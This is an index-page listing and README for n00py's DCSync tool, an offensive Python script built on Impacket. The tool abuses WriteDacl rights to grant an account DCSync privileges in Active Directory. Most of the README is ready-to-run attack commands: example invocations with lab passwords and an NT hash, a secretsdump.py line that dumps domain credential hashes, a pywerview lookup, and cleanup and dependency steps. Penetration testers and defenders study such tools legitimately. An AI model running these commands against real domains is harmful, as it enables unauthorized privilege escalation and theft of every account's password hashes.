Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/n00py/DCSync
DCSync Attack from Outside using Impacket
https://github.com/n00py/DCSync
Last synced: 21 days ago
JSON representation
DCSync Attack from Outside using Impacket
- Host: GitHub
- URL: https://github.com/n00py/DCSync
- Owner: n00py
- Created: 2022-01-19T20:31:03.000Z (almost 3 years ago)
- Default Branch: main
- Last Pushed: 2022-05-02T14:19:02.000Z (over 2 years ago)
- Last Synced: 2024-10-19T19:43:42.017Z (about 2 months ago)
- Language: Python
- Homepage: https://www.n00py.io/2022/01/adding-dcsync-permissions-from-linux/
- Size: 29.3 KB
- Stars: 109
- Watchers: 2
- Forks: 15
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - n00py/DCSync - DCSync Attack from Outside using Impacket (Python)
README
# Adding DCSync Permissions
Mostly copypasta from https://github.com/tothi/rbcd-attack
```
usage: DCSync.py [-h] -dc FQDN -t USERNAME [-hashes LMHASH:NTHASH] [-k] identityWriteDacl Attack: To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges.
positional arguments:
identity domain\username:password, attacker account with write access to target computer properties (NetBIOS domain name must be used!)options:
-h, --help show this help message and exit
-dc FQDN FQDN of the Domain Controller
-t USERNAME Target user to be escalated in format *Distinguished Names*
-hashes LMHASH:NTHASH
Hash for LDAP auth (instead of password)
-k If you want to use a Kerberos ticketExamples:
DCSync.py -dc dc01.n00py.local -t 'CN=n00py,OU=Employees,DC=n00py,DC=local' n00py\Administrator:Password123
DCSync.py -dc dc01.n00py.local -t 'CN=n00py,OU=Employees,DC=n00py,DC=local' n00py\Administrator -k
DCSync.py -dc dc01.n00py.local -t 'CN=spoNge369,CN=Users,DC=n00py,DC=local' 'n00py.local\user_with_writeDACL:P@$$w0rd123'
DCSync.py -dc dc01.n00py.local -t 'CN=spoNge369,CN=Users,DC=n00py,DC=local' 'n00py.local\user_with_writeDACL' -hashes :32693b11e6aa90eb43d32c72a07ceea6DCSync Attack:
secretsdump.py 'n00py.local/spoNge369:[email protected]'Search Distinguished Names(DN) of spoNge369:
pywerview get-netuser -u'any_valid_user' -p'password321$' -t dc01.n00py.local | perl -wnlE'print if/distinguishedname.+spoNge369/'
```To clean up after you are done, use ACLpwn https://github.com/fox-it/aclpwn.py. This tool is pretty old and not maintained, but you can get it to work. One thing you will need to do is replace “neo4j.v1” with just “neo4j” in database.py. To restore the ACLs to the original configuration, use the restore state file created by the DCSync tool.
## Dependencies:
Impacket
`pip3 install pywerview`For kerberos:
```
apt install heimdal-dev -y
apt install libkrb5-dev -y
python3 -m pip install gssapi
```